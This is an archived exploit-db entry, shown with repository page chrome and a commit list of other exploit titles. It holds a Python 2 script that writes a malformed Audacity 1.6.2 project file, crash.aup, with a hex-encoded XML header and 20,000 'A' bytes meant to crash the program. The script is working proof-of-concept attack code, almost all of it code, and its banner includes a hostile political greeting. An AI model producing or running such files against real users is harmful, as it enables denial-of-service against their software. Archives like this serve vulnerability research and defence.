exploit-db-mirror/platforms/windows/dos/7694.py
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

57 lines
2.3 KiB
Python
Executable file

#usage: exploit.py
print "**************************************************************************"
print " Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploit\n"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to: All friends"
print " almawto li israel\n"
print "**************************************************************************"
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f"
"\x3e\x0d\x0a\x3c\x61\x75\x64\x61\x63\x69\x74"
"\x79\x70\x72\x6f\x6a\x65\x63\x74\x20\x70\x72"
"\x6f\x6a\x6e\x61\x6d\x65\x3d\x22"
)
header2 = (
"\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
"\x31\x2e\x31\x2e\x30\x22\x20\x61\x75\x64\x61"
"\x63\x69\x74\x79\x76\x65\x72\x73\x69\x6f\x6e"
"\x3d\x22\x31\x2e\x32\x2e\x36\x22\x20\x73\x65"
"\x6c\x30\x3d\x22\x30\x2e\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x22\x20\x73\x65\x6c\x31"
"\x3d\x22\x30\x2e\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x22\x20\x76\x70\x6f\x73\x3d\x22"
"\x30\x22\x20\x68\x3d\x22\x30\x2e\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x22\x20\x7a\x6f"
"\x6f\x6d\x3d\x22\x38\x36\x2e\x31\x33\x32\x38"
"\x31\x32\x35\x30\x30\x30\x22\x20\x72\x61\x74"
"\x65\x3d\x22\x34\x34\x31\x30\x30\x2e\x30\x30"
"\x30\x30\x30\x30\x22\x20\x3e\x0d\x0a\x09\x3c"
"\x74\x61\x67\x73\x20\x74\x69\x74\x6c\x65\x3d"
"\x22\x22\x20\x61\x72\x74\x69\x73\x74\x3d\x22"
"\x22\x20\x61\x6c\x62\x75\x6d\x3d\x22\x22\x20"
"\x74\x72\x61\x63\x6b\x3d\x22\x2d\x31\x22\x20"
"\x79\x65\x61\x72\x3d\x22\x22\x20\x67\x65\x6e"
"\x72\x65\x3d\x22\x2d\x31\x22\x20\x63\x6f\x6d"
"\x6d\x65\x6e\x74\x73\x3d\x22\x22\x20\x69\x64"
"\x33\x76\x32\x3d\x22\x31\x22\x20\x2f\x3e\x0d"
"\x0a\x3c\x2f\x61\x75\x64\x61\x63\x69\x74\x79"
"\x70\x72\x6f\x6a\x65\x63\x74\x3e"
)
buff = "\x41" * 20000
exploit = header + buff + header2
try:
out_file = open("crash.aup",'w')
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-01-07]